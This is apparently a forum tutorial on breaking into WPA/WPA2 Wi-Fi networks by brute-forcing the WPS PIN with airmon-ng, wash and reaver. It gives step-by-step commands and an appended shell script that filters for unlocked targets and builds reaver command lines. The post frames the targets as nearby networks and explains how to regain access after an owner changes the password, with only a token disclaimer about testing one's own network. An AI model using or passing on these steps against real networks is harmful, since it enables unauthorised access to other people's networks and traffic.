There are probably many of you that already know this, and many that don't, so I thought I'd make a post on how to do this.
I've tried cracking WPA2 with a dictionary attack many, many times and it fails a lot, and brute force takes way too long.
Newer routers have a function called WPS, or WiFi Protected Setup; these routers are usually also 802.11n routers, which usually have better speed than old ones.
WPS is a setup mechanism that attempts to make it easy to establish a secure wireless home network. The client proves it belongs by sending an 8-digit PIN, but the access point acknowledges the first four digits separately from the last three, and the eighth digit is a checksum, so the PIN can be found in at most 11,000 attempts instead of 100 million.
It works ONLY against WPA/WPA2 networks with WPS enabled. Against an access point that does not lock WPS after failed PIN attempts it succeeds reliably; it can take from 30 minutes up to 10 hours, depending on signal quality and on how quickly the access point answers each PIN attempt.
First you need to locate which networks in your area have WPS enabled (usually many).
I'm assuming you're on BackTrack, so let's begin.
Tools used
- Aircrack
- Reaver
1) Locate your wireless interface with ifconfig (or iwconfig).
2) airmon-ng start yourinterface (usually wlan0); this creates the monitor interface mon0.
3) So how do we know if a router has WPS enabled? Type: wash -i mon0 to see the list of WPS-enabled routers. Check the WPS Locked column: an access point showing Yes is rate-limiting PIN attempts and will be slow or impossible to attack.
4) Copy the BSSID of the network of your choice, then close wash (Ctrl-C); we only use it to get the BSSID.
5) For reaver's options, type reaver -h in a terminal and read through the switches.
6) To begin the attack on the target BSSID, type: reaver -i mon0 -b (BSSID) -vv. The -i monitor interface is required; reaver will not start without it.
7) As shown in the example below, reaver first waits for a beacon from the target BSSID.
8) Reaver then switches the monitor interface (mon0) to the target's channel.
9) Reaver associates with the target BSSID, and the brute force against WPS begins.
10) Reaver's terminal output shows each PIN as it is tried against the WPS, together with the running progress.
11) This can take anywhere from 30 minutes to 10 hours. It will succeed as long as the access point keeps answering PIN attempts; if reaver warns that the access point is rate limiting, it has stopped responding and reaver waits for it to unlock before continuing.
12) If the brute force succeeds, the end result is as shown below: reaver prints the WPS PIN and the WPA PSK.
If you cancel the process in the middle, you can just start it again and reaver will ask whether to resume from where you stopped, since it saves its progress for each BSSID.
Also, if the owner changes the password, you can give reaver the PIN it found (reaver -i mon0 -b (BSSID) -p (PIN)) and it will recover the new password in a matter of seconds: the PIN does not change when the passphrase does.
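Added example, not code from the original post: a small POSIX sh helper around the wash/reaver steps above. The interface names (wlan0, mon0), the BSSIDs and the wash listing are constructed assumptions. It shows why the PIN space is only 11,000 attempts (the eighth digit is a checksum the attacker can compute), filters a wash listing down to access points whose WPS is not locked, and builds the reaver command lines for step 6 and for recovering a changed passphrase with a known PIN.

```shell
#!/bin/sh
# Added example, not from the original post. Interface names, BSSIDs and the
# wash listing below are constructed for illustration.

# Checksum digit for the 7-digit body of a WPS PIN (the 8th digit). Because the
# AP acknowledges the first 4 digits separately from the last 3, and the 8th is
# derivable, reaver needs at most 10^4 + 10^3 = 11,000 attempts, not 10^8.
wps_checksum() {
    pin=$(printf '%s' "$1" | sed 's/^0*//')   # strip leading zeros: no octal
    [ -n "$pin" ] || pin=0
    accum=0
    while [ "$pin" -gt 0 ]; do
        accum=$((accum + 3 * (pin % 10)))
        pin=$((pin / 10))
        accum=$((accum + pin % 10))
        pin=$((pin / 10))
    done
    echo $(( (10 - accum % 10) % 10 ))
}

# Full 8-digit PIN for a 7-digit body, e.g. 1234567 -> 12345670.
wps_pin() {
    body=$(printf '%s' "$1" | sed 's/^0*//')
    [ -n "$body" ] || body=0
    printf '%07d%d\n' "$body" "$(wps_checksum "$body")"
}

# Constructed wash listing in the column layout wash prints (step 3).
SAMPLE_WASH='BSSID                  Channel       RSSI       WPS Version       WPS Locked         ESSID
---------------------------------------------------------------------------------------------------------------
00:11:22:33:44:55       6            -54        1.0               No                 HomeNet
66:77:88:99:AA:BB      11            -71        1.0               Yes                Office
CC:DD:EE:FF:00:11       1            -60        1.0               No                 Cafe'

# Read a wash listing on stdin and print "BSSID channel ESSID" for APs whose
# WPS is not locked; a locked AP is rate-limiting PIN attempts (step 11).
# ESSIDs containing spaces are truncated to their first word.
unlocked_wps_targets() {
    awk 'NR > 2 && $5 == "No" { print $1, $2, $6 }'
}

# reaver command line for step 6. The post omits -i; reaver refuses to start
# without the monitor interface. Passing the channel with -c skips scanning.
reaver_attack_cmd() {   # $1 = monitor iface, $2 = BSSID, $3 = channel (optional)
    if [ -n "${3:-}" ]; then
        echo "reaver -i $1 -b $2 -c $3 -vv"
    else
        echo "reaver -i $1 -b $2 -vv"
    fi
}

# reaver command line to recover a changed passphrase from a known PIN (-p):
# the PIN stays the same when the owner changes the WPA passphrase.
reaver_pin_cmd() {      # $1 = monitor iface, $2 = BSSID, $3 = 8-digit PIN
    echo "reaver -i $1 -b $2 -p $3 -vv"
}

# Usage on BackTrack (assumed interface wlan0 -> mon0); these are not run here:
#   airmon-ng start wlan0
#   wash -i mon0            # Ctrl-C once the target is listed
#   $(reaver_attack_cmd mon0 00:11:22:33:44:55 6)
#   $(reaver_pin_cmd mon0 00:11:22:33:44:55 12345670)
if [ "${1:-}" = "demo" ]; then
    printf '%s\n' "$SAMPLE_WASH" | unlocked_wps_targets
fi
```

Run it with `sh script.sh demo` to see the constructed listing filtered to the two unlocked access points; the checksum routine is the same calculation reaver uses to skip PINs that cannot be valid, and it is why the progress counter in step 10 counts towards 11,000 rather than 100 million.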
I have found this very useful, and those who didn't already know this might find good use for it.
This is only meant for penetration testing your own network, of course; I do not encourage hacking.
Adios!